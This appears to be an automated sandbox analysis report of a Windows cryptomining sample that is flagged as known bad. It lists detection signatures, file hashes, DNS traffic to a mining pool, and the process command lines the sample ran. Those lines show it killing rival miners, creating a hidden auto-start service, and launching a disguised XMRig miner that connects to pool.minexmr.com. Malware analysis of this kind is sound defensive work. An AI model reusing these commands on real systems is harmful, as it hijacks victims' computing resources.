Analysis Overview
SHA256
1faff4cf4bfe0d40af1555dc2ca749c5a382197b51b327ad89c4734d6ba75ee3
Threat Level: Known bad
The file 5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
xmrig
XMRig Miner payload
Sets file to hidden
Creates new service(s)
Stops running service(s)
Loads dropped DLL
VMProtect packed file
Executes dropped EXE
Checks computer location settings
Deletes itself
Drops file in Windows directory
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Runs net.exe
Kills process with taskkill
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Views/modifies file attributes
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-20 10:26
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-20 10:26
Reported
2024-05-20 10:28
Platform
win10v2004-20240426-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\WINDOWS\Debug\wkde\mscorsvw.exe | N/A |
| N/A | N/A | C:\WINDOWS\Debug\wkde\svchost.exe | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\WINDOWS\Debug\wkde\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WINDOWS\Debug\wkde\wk.bat" "
C:\Windows\SysWOW64\sc.exe
sc delete Systemss
C:\Windows\SysWOW64\sc.exe
sc delete WMIserver
C:\Windows\SysWOW64\sc.exe
sc delete WMIservers
C:\Windows\SysWOW64\sc.exe
sc delete WMI
C:\Windows\SysWOW64\sc.exe
sc delete Serv
C:\Windows\SysWOW64\sc.exe
sc delete system_update
C:\Windows\SysWOW64\sc.exe
sc delete system_updatea
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spoolsvs.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskhost.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NsCpuapl.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MSASCui.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im nheqminer_zcash.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im nssm.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im update.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im server.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sppscv.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskhost.exe
C:\Windows\SysWOW64\net.exe
net stop wkde
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wkde
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\taskkill.exe
taskkill /im mscorsvw.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im WUDFHost.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im nheqminer.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im NsCpuCNMiner32.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im NsCpuCNMiner64.exe /f
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\sc.exe
sc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto
C:\Windows\SysWOW64\net.exe
net start wkde
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start wkde
C:\WINDOWS\Debug\wkde\mscorsvw.exe
C:\WINDOWS\Debug\wkde\mscorsvw.exe
C:\WINDOWS\Debug\wkde\svchost.exe
C:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1%
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.88:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.61.62.23.in-addr.arpa | udp |
| NL | 23.62.61.88:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
| US | 8.8.8.8:53 | 136.71.105.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
Files
C:\WINDOWS\Debug\wkde\wk.bat
| MD5 | 816d97b2dca2af96209ef913291d59be |
| SHA1 | a3c480a7e333a1623e7cd8194d68468397c3f6d1 |
| SHA256 | ccf0010fcc0783096c0323c3bbe6a88a4d969c8b327626d1eb5b493e03a8e54d |
| SHA512 | 54bbff4724a8b2065273f118aa1eeb61542df82fc853e01155470053b8f18cd9e1c0f8618c077dab13767e187f93653842a8df852496e5bdf7e2dd7fc0120088 |
C:\Windows\debug\wkde\mscorsvw.exe
| MD5 | cbb4ca806e69a4880dd02e04e5bce18b |
| SHA1 | 1e838ddad7b04a1f2be935f6fe8e7cff3466c4d7 |
| SHA256 | 2cadd79540acdfcc6d99875a79ed7c35fd3508e5ba6c29c9caae598fcc40b79b |
| SHA512 | 6240fcdf8899c8d62357ad4cfe4c749517fa91c81d8765f2e1b3e23fdf95cdde09f8954da5b5f0ef1e0fa7e34d88e5dd7070134eefc40f98a6b6264f18a295a6 |
memory/1648-13-0x0000000000400000-0x000000000055E000-memory.dmp
C:\WINDOWS\Debug\wkde\mscorsvw.ini
| MD5 | d298cd48c88433017ef4e66af740830e |
| SHA1 | e0ef455dc4df16948d85c5a058d0980ce5020822 |
| SHA256 | b22ef4711432e08a93b9ef241616e51f17744a762e47b1d871aeabb6d4ae5d89 |
| SHA512 | 5927b46c620a5b91b072ac48d7c5f2a98eff1984c8b82ae636512ebcfbb1a9d3b122f4cae81c802da4a81b0c5ee3143a931eaf42844226b7ea6aeaeceb12b8fe |
memory/1648-14-0x0000000000400000-0x000000000055E000-memory.dmp
C:\Windows\debug\wkde\svchost.exe
| MD5 | 79a1ec8d32e8e3032b5f5126c11f2216 |
| SHA1 | 86dc55fcdc358a5c6699c41582b66b75bedc4086 |
| SHA256 | d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8 |
| SHA512 | a80fa204f05a5be209a945af9c5f8e6773c338a3cb5bd526c29e78932ed04d2c625dcb3fe5e918b07b316ba6981bb517714ad524a37f73f6055600ae1c145106 |
C:\WINDOWS\Debug\wkde\mscorsvw.log
| MD5 | 0a98d172405546d83c748505a590f268 |
| SHA1 | 0a107d99277cc976260d59d60ea2e513a5280688 |
| SHA256 | cb4075e76b795f5a464a50114628b2d62e3546aa9735a0ebffef29b3e94bdcac |
| SHA512 | 89c091858c44cd0055a33de6fd89b20f0735bdb071f03158b76ae312af8901827f3fd26c3c7f12cfe777e42f1d4f7874da30770b3ebcb4fadd79543d100af0ef |
memory/4040-24-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/4040-25-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/1648-26-0x0000000000400000-0x000000000055E000-memory.dmp
memory/4040-27-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/4040-28-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/4040-29-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/4040-30-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/4040-31-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/4040-32-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/4040-33-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/4040-34-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/4040-35-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/4040-36-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/4040-37-0x0000000000400000-0x00000000004B5000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-20 10:26
Reported
2024-05-20 10:28
Platform
win7-20240220-en
Max time kernel
148s
Max time network
121s
Command Line
Signatures
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Stops running service(s)
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\WINDOWS\Debug\wkde\mscorsvw.exe | N/A |
| N/A | N/A | C:\WINDOWS\Debug\wkde\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\WINDOWS\Debug\wkde\mscorsvw.exe | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\WINDOWS\Debug\wkde\svchost.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\5e960ba61a82c5340650e2ce975bb4c9_JaffaCakes118.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\WINDOWS\Debug\wkde\wk.bat" "
C:\Windows\SysWOW64\sc.exe
sc delete Systemss
C:\Windows\SysWOW64\sc.exe
sc delete WMIserver
C:\Windows\SysWOW64\sc.exe
sc delete WMIservers
C:\Windows\SysWOW64\sc.exe
sc delete WMI
C:\Windows\SysWOW64\sc.exe
sc delete Serv
C:\Windows\SysWOW64\sc.exe
sc delete system_update
C:\Windows\SysWOW64\sc.exe
sc delete system_updatea
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im spoolsvs.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskhost.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im NsCpuapl.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MSASCui.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im nheqminer_zcash.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im nssm.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im update.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im server.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sppscv.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im taskhost.exe
C:\Windows\SysWOW64\net.exe
net stop wkde
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wkde
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\taskkill.exe
taskkill /im mscorsvw.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im WUDFHost.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im nheqminer.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im NsCpuCNMiner32.exe /f
C:\Windows\SysWOW64\taskkill.exe
taskkill /im NsCpuCNMiner64.exe /f
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\sc.exe
sc create wkde binPath= C:\WINDOWS\Debug\wkde\mscorsvw.exe start= auto
C:\Windows\SysWOW64\net.exe
net start wkde
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start wkde
C:\WINDOWS\Debug\wkde\mscorsvw.exe
C:\WINDOWS\Debug\wkde\mscorsvw.exe
C:\WINDOWS\Debug\wkde\svchost.exe
C:\WINDOWS\Debug\wkde\svchost.exe -o pool.minexmr.com:5555 -u 42NQYEALh7aC85Q376QpbJauGPfLLHUr3ZQCctLDEWQE3gWQUqfuDGg3vavPEB5edtGbtCHFTs6UJfZtHd2fVGAzHLwXmuN -p x -k --donate-level=1%
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.exe
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\svchost.exe
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.ini
C:\Windows\SysWOW64\attrib.exe
attrib +s +h C:\WINDOWS\Debug\wkde\mscorsvw.log
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pool.minexmr.com | udp |
Files
C:\Windows\debug\wkde\wk.bat
| MD5 | 816d97b2dca2af96209ef913291d59be |
| SHA1 | a3c480a7e333a1623e7cd8194d68468397c3f6d1 |
| SHA256 | ccf0010fcc0783096c0323c3bbe6a88a4d969c8b327626d1eb5b493e03a8e54d |
| SHA512 | 54bbff4724a8b2065273f118aa1eeb61542df82fc853e01155470053b8f18cd9e1c0f8618c077dab13767e187f93653842a8df852496e5bdf7e2dd7fc0120088 |
C:\Windows\debug\wkde\mscorsvw.exe
| MD5 | cbb4ca806e69a4880dd02e04e5bce18b |
| SHA1 | 1e838ddad7b04a1f2be935f6fe8e7cff3466c4d7 |
| SHA256 | 2cadd79540acdfcc6d99875a79ed7c35fd3508e5ba6c29c9caae598fcc40b79b |
| SHA512 | 6240fcdf8899c8d62357ad4cfe4c749517fa91c81d8765f2e1b3e23fdf95cdde09f8954da5b5f0ef1e0fa7e34d88e5dd7070134eefc40f98a6b6264f18a295a6 |
memory/2164-24-0x0000000000400000-0x000000000055E000-memory.dmp
C:\WINDOWS\Debug\wkde\svchost.exe
| MD5 | 79a1ec8d32e8e3032b5f5126c11f2216 |
| SHA1 | 86dc55fcdc358a5c6699c41582b66b75bedc4086 |
| SHA256 | d3bc4df4062d1a93dfe8e5beae484f011285b6c5b1f92bfa765deb59981ae2c8 |
| SHA512 | a80fa204f05a5be209a945af9c5f8e6773c338a3cb5bd526c29e78932ed04d2c625dcb3fe5e918b07b316ba6981bb517714ad524a37f73f6055600ae1c145106 |
memory/2164-25-0x0000000000400000-0x000000000055E000-memory.dmp
C:\WINDOWS\Debug\wkde\mscorsvw.ini
| MD5 | d298cd48c88433017ef4e66af740830e |
| SHA1 | e0ef455dc4df16948d85c5a058d0980ce5020822 |
| SHA256 | b22ef4711432e08a93b9ef241616e51f17744a762e47b1d871aeabb6d4ae5d89 |
| SHA512 | 5927b46c620a5b91b072ac48d7c5f2a98eff1984c8b82ae636512ebcfbb1a9d3b122f4cae81c802da4a81b0c5ee3143a931eaf42844226b7ea6aeaeceb12b8fe |
C:\WINDOWS\Debug\wkde\mscorsvw.log
| MD5 | df296d0aa6eb740c57059aa9f47fd46c |
| SHA1 | de668e0436d036c2608b3a16fbfaaf3cbfd52a59 |
| SHA256 | 3d8e422765d4e10add74a69d85ea827b90dbc2c25d021185f1bf1fbe3363823a |
| SHA512 | db6ef5caf3a7c682a64fe18583e2f91dc9b5fe71a274eaf5e0112246cc04b6a44abe5af7cececf73a3411f4364357acc92400b70c6d3fdd0854b4732126a8fc5 |
memory/444-35-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/444-36-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/2164-37-0x0000000000400000-0x000000000055E000-memory.dmp
memory/444-38-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/444-39-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/444-40-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/444-41-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/444-42-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/444-43-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/444-44-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/444-45-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/444-46-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/444-47-0x0000000000400000-0x00000000004B5000-memory.dmp
memory/444-48-0x0000000000400000-0x00000000004B5000-memory.dmp